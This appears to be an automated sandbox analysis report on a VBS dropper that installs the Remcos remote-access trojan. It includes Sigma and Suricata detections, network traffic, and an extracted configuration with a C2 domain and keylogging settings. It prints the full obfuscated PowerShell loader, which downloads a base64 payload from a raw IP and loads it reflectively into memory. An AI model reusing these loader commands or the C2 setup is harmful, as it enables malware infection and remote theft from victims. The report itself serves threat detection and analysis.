;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) 
;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 3644, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a
?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;,

                  Stealing of Sensitive Information

                  Source: Registry Key set | Author: Joe Security | Data: Details: A1 F4 A6 31 3F 06 0E 87 BA 2A 33 4C 42 68 88 64 3D 39 A2 ED C7 26 57 06 CB F8 5B 6C 40 10 41 A6 43 6A C8 3A A7 AB 3C BC 2C AE D1 64 97 A9 5F 30 BB B7 F0 A5 71 3D 93 82 69 B5 BF 60 BC 47 1B 9C 15 02 AF FB 99 83 0D 18 6F E7 FF 01 B9 7C 45 7B 1D 95 60 E7 C0 20 A7 38 3F 26 5F 3E 1B 34 94 11 A1 4C 9A 63 D7 72 37 E5 4F A7 C2 D6 A6 78 BA C8 CF 27 4F A8 2E 58 58 D2 EC CB AA AD 40 27 36 80 70 D3 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 7536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-0883UG\exepath
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-11-20T09:36:22.318836+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 52.217.196.57 | 443 | 192.168.2.7 | 49747 | TCP
                  2024-11-20T09:36:22.318836+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 52.217.196.57 | 443 | 192.168.2.7 | 49747 | TCP
                  2024-11-20T09:36:23.714286+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49759 | 190.9.223.135 | 4576 | TCP
                  2024-11-20T09:36:22.752887+0100 | 2057635 | 1 | A Network Trojan was detected | 52.217.196.57 | 443 | 192.168.2.7 | 49747 | TCP
                  2024-11-20T09:36:24.973348+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49769 | 178.237.33.50 | 80 | TCP
                  2024-11-20T09:36:22.752887+0100 | 2858295 | 1 | A Network Trojan was detected | 52.217.196.57 | 443 | 192.168.2.7 | 49747 | TCP


                  AV Detection

                  Source: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt | Avira URL Cloud: Label: malware
                  Source: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt | Avira URL Cloud: Label: malware
                  Source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["remcosnov24.duckdns.org:4576:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0883UG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Source: sostener.vbs | ReversingLabs: Detection: 21%
                  Source: Yara match | File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
                  Source: Yara match | File source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                  Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 15_2_0043293A
                  Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_aa758384-0

                  Exploits

                  Source: Yara match | File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR

                  Privilege Escalation

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00406764 _wcslen,CoGetObject, 15_2_00406764
                  Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49737 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 52.217.196.57:443 -> 192.168.2.7:49747 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 15_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 15_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 15_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0044D5E9 FindFirstFileExA, 15_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 15_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00406AC2 FindFirstFileW,FindNextFileW, 15_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 15_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW, 15_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 15_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 15_2_00406F06

                  Software Vulnerabilities

                  Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FFAAC48AD53h 7_2_00007FFAAC48ACE5
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FFAAC48D8A6h 7_2_00007FFAAC48D808

                  Networking

                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49759 -> 190.9.223.135:4576
                  Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 52.217.196.57:443 -> 192.168.2.7:49747
                  Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 52.217.196.57:443 -> 192.168.2.7:49747
                  Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 52.217.196.57:443 -> 192.168.2.7:49747
                  Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 52.217.196.57:443 -> 192.168.2.7:49747
                  Source: Malware configuration extractor | URLs: remcosnov24.duckdns.org
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net 
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in memory: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net 
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-uri https://web-security-
                  Source: unknown | DNS query: name: remcosnov24.duckdns.org
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                  Source: Yara match | File source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPE
                  Source: global traffic | TCP traffic: 192.168.2.7:49759 -> 190.9.223.135:4576
                  Source: global traffic | HTTP traffic detected: GET /hector4576--/noviembre19/downloads/sos19nov.txt HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNEU8mMXjgJqQ080SNiFV835eFr%2BbBRHNf7rm1neySGwglrM1o8LsYX0RovAU3W%2Bx4JB4pgdN4qsn1bW%2BfaD7XZjyLKF0JoYGK%2F0OwIw8v9GO6Ju75QefPFbX9xbLBwYMrmWW0lhQ%2B5mF%2BEx1g%3D%3D&Expires=1732092960 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt HTTP/1.1 Host: 91.202.233.169 Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                  Source: Joe Sandbox View | IP Address: 91.202.233.169 91.202.233.169
                  Source: Joe Sandbox View | IP Address: 185.166.143.49 185.166.143.49
                  Source: Joe Sandbox View | ASN Name: M247GB M247GB
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49769 -> 178.237.33.50:80
                  Source: global traffic | HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AD/dll.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 91.202.233.169 Connection: Keep-Alive
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.202.233.169
